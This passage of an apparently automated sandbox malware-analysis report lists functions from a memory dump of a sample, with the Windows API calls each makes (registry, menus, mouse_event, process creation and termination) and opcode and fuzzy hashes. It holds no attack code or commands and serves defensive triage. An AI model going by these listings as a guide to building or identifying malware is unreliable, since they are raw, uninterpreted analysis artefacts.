Part of subcall function 00FB3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 00FB9EDA
Part of subcall function 00FB3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 00FB9EED
Part of subcall function 00FB3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 00FB9F00
Part of subcall function 00FB3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 00FB9F13
Part of subcall function 00FB3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 00FB9F26
Part of subcall function 00FB3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 00FB9F39
Part of subcall function 00FB3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 00FB9F4C
Part of subcall function 00FB3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 00FB9F5F
Part of subcall function 00FB3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 00FB9F72
Part of subcall function 00FB3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 00FB9F85
Part of subcall function 00FB3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 00FB9F98
Part of subcall function 00FB3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 00FB9FAB
Part of subcall function 00FB3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 00FB9FBE

__mtinitlocks.LIBCMT ref: 00FB9AEB
__mtterm.LIBCMT ref: 00FB9AF4

Part of subcall function 00FB9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,00FB9AF9,00FB7CD0,0104A0B8,00000014), ref: 00FB9C56
Part of subcall function 00FB9B5C: _free.LIBCMT ref: 00FB9C5D
Part of subcall function 00FB9B5C: DeleteCriticalSection.KERNEL32(0104EC00,?,?,00FB9AF9,00FB7CD0,0104A0B8,00000014), ref: 00FB9C7F

__calloc_crt.LIBCMT ref: 00FB9B19
__initptd.LIBCMT ref: 00FB9B3B
GetCurrentThreadId.KERNEL32 ref: 00FB9B42

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
String ID:
API String ID: 3567560977-0
Opcode ID: e53458418f1e665c78b4a8b31e4f203decbb23deb4af4c55db70603144d86d54
Instruction ID: 99c4206f6657eb7083a2265306c66dd3b9590f40f3cf8f4c6634058476472f6e
Opcode Fuzzy Hash: e53458418f1e665c78b4a8b31e4f203decbb23deb4af4c55db70603144d86d54
Instruction Fuzzy Hash: 5AF0963690D7112AE6347677BC036CA36989F42734F204619F694C51C6EFDD89416E60

Function 00FB406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00FB3F85), ref: 00FB4085
GetProcAddress.KERNEL32(00000000), ref: 00FB408C
EncodePointer.KERNEL32(00000000), ref: 00FB4097
DecodePointer.KERNEL32(00FB3F85), ref: 00FB40B2

Strings

combase.dll, xrefs: 00FB4080
RoUninitialize, xrefs: 00FB4074

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
String ID: RoUninitialize$combase.dll
API String ID: 3489934621-2819208100
Opcode ID: e6435454e11e39f192c40f95c3d4e7234dd756d0400f81c26567d2fa331cc07e
Instruction ID: eb05e3a2353431a283ae9d184b08ccbd9cd1020c2157e94c108c965311bd49ba
Opcode Fuzzy Hash: e6435454e11e39f192c40f95c3d4e7234dd756d0400f81c26567d2fa331cc07e
Instruction Fuzzy Hash: C1E09A70581301ABDB30AF72E909B463AB9B714792F104018F981D9048CB7F5504AB18

Function 00FF64B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 00FF660B
_memmove.LIBCMT ref: 00FF6546

Part of subcall function 00F99837: __itow.LIBCMT ref: 00F99862
Part of subcall function 00F99837: __swprintf.LIBCMT ref: 00F998AC

_memmove.LIBCMT ref: 00FF65B9
_memmove.LIBCMT ref: 00FF66A0
_memmove.LIBCMT ref: 00FF66B9
_memmove.LIBCMT ref: 00FF66D5

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: _memmove$__itow__swprintf
String ID:
API String ID: 3253778849-0
Opcode ID: a58d8e04907be816c1a8c2b1cfa04116343d40ab12aac618fe0cb4aadb09adbf
Instruction ID: dec662f8f33b801b22977ed16e574643be23925a3d131df737b25c24ecbd9b2d
Opcode Fuzzy Hash: a58d8e04907be816c1a8c2b1cfa04116343d40ab12aac618fe0cb4aadb09adbf
Instruction Fuzzy Hash: 5E61AD3190024E9BDF01EF64CC82AFE37A9AF04308F494518FA15AB1A2DF78EC05EB50

Function 010101E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00F97DE1: _memmove.LIBCMT ref: 00F97E22

Part of subcall function 01010E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0100FDAD,?,?), ref: 01010E31

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 010102BD
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 010102FD
RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 01010320
RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 01010349
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0101038C
RegCloseKey.ADVAPI32(00000000), ref: 01010399

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
String ID:
API String ID: 4046560759-0
Opcode ID: a7ba51709280faa4ac8b4eef714940acda8edfa8fabeabe2332c88ddb1c414d5
Instruction ID: 4737fd98714c480b12b249c8d3a4e94c27e837b5737af3e74678096eb7a23cbc
Opcode Fuzzy Hash: a7ba51709280faa4ac8b4eef714940acda8edfa8fabeabe2332c88ddb1c414d5
Instruction Fuzzy Hash: 94516831208301AFDB15EF68C885EAFBBE8EF84314F04491DF585872A5DB39E948DB52

Function 01015799 Relevance: 9.2, APIs: 6, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 010157FB
GetMenuItemCount.USER32(00000000), ref: 01015832
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 0101585A
GetMenuItemID.USER32(?,?), ref: 010158C9
GetSubMenu.USER32(?,?), ref: 010158D7
PostMessageW.USER32(?,00000111,?,00000000), ref: 01015928

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Menu$Item$CountMessagePostString
String ID:
API String ID: 650687236-0
Opcode ID: 101cc84546ddc8ccca6fd091e75c9fa6ac75a2acd472d3452eb30e087afdafe5
Instruction ID: a615528173cb7db797e2650d57c78bf07315140636d29ea6b6b1aad11f4a7ac9
Opcode Fuzzy Hash: 101cc84546ddc8ccca6fd091e75c9fa6ac75a2acd472d3452eb30e087afdafe5
Instruction Fuzzy Hash: BF518C31E00615AFDF11DF68CC45AAEBBB5EF89320F004099ED81BB351CB79AE419B90

Function 00FEEEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00FEEF06
VariantClear.OLEAUT32(00000013), ref: 00FEEF78
VariantClear.OLEAUT32(00000000), ref: 00FEEFD3
_memmove.LIBCMT ref: 00FEEFFD
VariantClear.OLEAUT32(?), ref: 00FEF04A
VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00FEF078

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Variant$Clear$ChangeInitType_memmove
String ID:
API String ID: 1101466143-0
Opcode ID: 37008fc6dc523080f9b84586aa76f966ab01f8f3696c2f2752f6793cc13cbab2
Instruction ID: 841cc7f156438ecdd4870abc60c887791e3df5ad67e0905d8a36c122fd083326
Opcode Fuzzy Hash: 37008fc6dc523080f9b84586aa76f966ab01f8f3696c2f2752f6793cc13cbab2
Instruction Fuzzy Hash: 02517BB5A00249EFCB10CF58C880AAAB7B8FF4C310B158569EE49DB305E735E915CFA0

Function 00FF220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00FF2258
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00FF22A3
IsMenu.USER32(00000000), ref: 00FF22C3
CreatePopupMenu.USER32 ref: 00FF22F7
GetMenuItemCount.USER32(000000FF), ref: 00FF2355
InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00FF2386

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup_memset
String ID:
API String ID: 3311875123-0
Opcode ID: 8f7a16c3d73acf118566bbc5ff6b43ba2e3a5dc6cbd93349d97b68d862d87a1e
Instruction ID: ef6f058e66c0bc07fe96291e065d5b24b4d8e5542b8f236aa9df15a528472d6f
Opcode Fuzzy Hash: 8f7a16c3d73acf118566bbc5ff6b43ba2e3a5dc6cbd93349d97b68d862d87a1e
Instruction Fuzzy Hash: CC51CFB0A0020EDBDF61CF68C888BBDBBF5BF05324F104159EA55AB2A0D3798904DB51

Function 00F91765 Relevance: 9.1, APIs: 6, Instructions: 113COMMON

Download Yara Rule

APIs

Part of subcall function 00F92612: GetWindowLongW.USER32(?,000000EB), ref: 00F92623

BeginPaint.USER32(?,?,?,?,?,?), ref: 00F9179A
GetWindowRect.USER32(?,?), ref: 00F917FE
ScreenToClient.USER32(?,?), ref: 00F9181B
SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00F9182C
EndPaint.USER32(?,?), ref: 00F91876

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: PaintWindow$BeginClientLongRectScreenViewport
String ID:
API String ID: 1827037458-0
Opcode ID: b895ac979b0d27a40ba1ee12be6495450222dca882178600d0916bca9719a930
Instruction ID: aa8692f857004e321151ad29a9f6a10228584fcc63dedbb78edb882c482ef8ef
Opcode Fuzzy Hash: b895ac979b0d27a40ba1ee12be6495450222dca882178600d0916bca9719a930
Instruction Fuzzy Hash: 2D41A231504302AFEB20DF24CC85FB67BE8FB59724F144668F594872A1C7359845EB61

Function 0101B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON

Download Yara Rule

APIs

ShowWindow.USER32(010557B0,00000000,01B38578,?,?,010557B0,?,0101B5A8,?,?), ref: 0101B712
EnableWindow.USER32(00000000,00000000), ref: 0101B736
ShowWindow.USER32(010557B0,00000000,01B38578,?,?,010557B0,?,0101B5A8,?,?), ref: 0101B796
ShowWindow.USER32(00000000,00000004,?,0101B5A8,?,?), ref: 0101B7A8
EnableWindow.USER32(00000000,00000001), ref: 0101B7CC
SendMessageW.USER32(?,0000130C,?,00000000), ref: 0101B7EF

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Window$Show$Enable$MessageSend
String ID:
API String ID: 642888154-0
Opcode ID: f2a0576f16cb84937c04593f98e227afc6fee7c2b5b11b82e31eca87bfe31124
Instruction ID: 3e94857899c6671a61ae0f11ffd1312df9fa6299f2d4dfc3eefe1e8b24cfb393
Opcode Fuzzy Hash: f2a0576f16cb84937c04593f98e227afc6fee7c2b5b11b82e31eca87bfe31124
Instruction Fuzzy Hash: F8417134600241AFDB62CF28C499B947FF1FF09310F1C41E9EA888F6A6C739A456DB50

Function 0100709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,?,?,?,?,01004E41,?,?,00000000,00000001), ref: 010070AC

Part of subcall function 010039A0: GetWindowRect.USER32(?,?), ref: 010039B3

GetDesktopWindow.USER32 ref: 010070D6
GetWindowRect.USER32(00000000), ref: 010070DD
mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0100710F

Part of subcall function 00FF5244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FF52BC

GetCursorPos.USER32(?), ref: 0100713B
mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 01007199

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
String ID:
API String ID: 4137160315-0
Opcode ID: a5671fc919bf8dc0bc9c0f0f9ce5fd4b17e94b873e9aa5e718fd98bfcf716756
Instruction ID: 0dcbff7d9bf948ec7b8850a445e41b7c3b3ab7954a83b6b74b028b00d522f0c8
Opcode Fuzzy Hash: a5671fc919bf8dc0bc9c0f0f9ce5fd4b17e94b873e9aa5e718fd98bfcf716756
Instruction Fuzzy Hash: AD31B272505306AFD721DF18C849B9BBBEAFF88314F000919F6D5971C1CA79EA09CB92

Function 00FE8879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00FE80A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00FE80C0
Part of subcall function 00FE80A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00FE80CA
Part of subcall function 00FE80A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00FE80D9
Part of subcall function 00FE80A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00FE80E0
Part of subcall function 00FE80A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00FE80F6

GetLengthSid.ADVAPI32(?,00000000,00FE842F), ref: 00FE88CA
GetProcessHeap.KERNEL32(00000008,00000000), ref: 00FE88D6
HeapAlloc.KERNEL32(00000000), ref: 00FE88DD
CopySid.ADVAPI32(00000000,00000000,?), ref: 00FE88F6
GetProcessHeap.KERNEL32(00000000,00000000,00FE842F), ref: 00FE890A
HeapFree.KERNEL32(00000000), ref: 00FE8911

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
String ID:
API String ID: 3008561057-0
Opcode ID: f1795acbea8cce36c00283834b55a93487c2e08c6df55c6e0f4bd0a3d500b455
Instruction ID: 2ef467242e592683924335159e3439914824f029ba1a72d8f86f4100062a5fcd
Opcode Fuzzy Hash: f1795acbea8cce36c00283834b55a93487c2e08c6df55c6e0f4bd0a3d500b455
Instruction Fuzzy Hash: 9911B431901205FFDB21AF95DC09BBE7769EB45361F104119F88997101CB3A9D05EB61

Function 00FE85B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 00FE85E2
OpenProcessToken.ADVAPI32(00000000), ref: 00FE85E9
CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00FE85F8
CloseHandle.KERNEL32(00000004), ref: 00FE8603
CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00FE8632
DestroyEnvironmentBlock.USERENV(00000000), ref: 00FE8646

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
String ID:
API String ID: 1413079979-0
Opcode ID: 0f187d1fc340a69cf41f7b970e1b05b95b5dfc7653e01265c98e7b0c9a5ed133
Instruction ID: 8469fe27b4a6f8dba6b4678ae47ec128c5ab3f648834be3c04f646f39792d8f9
Opcode Fuzzy Hash: 0f187d1fc340a69cf41f7b970e1b05b95b5dfc7653e01265c98e7b0c9a5ed133
Instruction Fuzzy Hash: 5B118C7250024AAFDF12DEA4DC48BDE7BA8FF08354F044014FE09A2160C77A8E65EB60

Function 00FEB790 Relevance: 9.0, APIs: 6, Instructions: 49COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 00FEB7B5
GetDeviceCaps.GDI32(00000000,00000058), ref: 00FEB7C6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00FEB7CD
ReleaseDC.USER32(00000000,00000000), ref: 00FEB7D5
MulDiv.KERNEL32(000009EC,?,00000000), ref: 00FEB7EC
MulDiv.KERNEL32(000009EC,?,?), ref: 00FEB7FE

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: CapsDevice$Release
String ID:
API String ID: 1035833867-0
Opcode ID: f53e012edc1c35793b4c38f6cc9f6e21956291cba9d4a76e15d04a9dc1a9985d
Instruction ID: e5eaae03d10d4d60ef3c23251ee8f10cced00eb1ce637d18bd5ba14da5c5e9b1
Opcode Fuzzy Hash: f53e012edc1c35793b4c38f6cc9f6e21956291cba9d4a76e15d04a9dc1a9985d
Instruction Fuzzy Hash: AC018475E00309BBEF109BF69C45A5EBFB8EB48361F004065FA04A7281D6359C00CF90

Function 00FB0162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON

Download Yara Rule

APIs

MapVirtualKeyW.USER32(0000005B,00000000), ref: 00FB0193
MapVirtualKeyW.USER32(00000010,00000000), ref: 00FB019B
MapVirtualKeyW.USER32(000000A0,00000000), ref: 00FB01A6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 00FB01B1
MapVirtualKeyW.USER32(00000011,00000000), ref: 00FB01B9
MapVirtualKeyW.USER32(00000012,00000000), ref: 00FB01C1

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: fdea3d509cca070ae2f794051c4ac75159c458f9c1795713a85e26296b373cf5
Instruction ID: 04d135753d54c82f1ce9a57e0e06ff83cc8c8f11549f5dd7a2a1cbc4ce11b84c
Opcode Fuzzy Hash: fdea3d509cca070ae2f794051c4ac75159c458f9c1795713a85e26296b373cf5
Instruction Fuzzy Hash: F0016CB0901B5A7DE3008F6A8C85B52FFA8FF19354F00411BA15C47941C7F5A868CBE5

Function 00FF53E9 Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00FF53F9
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00FF540F
GetWindowThreadProcessId.USER32(?,?), ref: 00FF541E
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FF542D
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FF5437
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 00FF543E

Memory Dump Source

Source File: 00000000.00000002.1487836147.0000000000F91000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F90000, based on PE: true

Associated: 00000000.00000002.1487812587.0000000000F90000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.000000000101F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487903247.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1487991879.000000000104E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1488015387.0000000001057000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f90000_bkTW1FbgHN.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: b19a1403ef4f31b4f978f2374e1dc0d6d41102cb8ff29ce668101dbe6356c04e
Instruction ID: e3cf021e1a671fc6cdddf00041b0ef6cbac25e59776dc7d49a6a854fdd1718f6
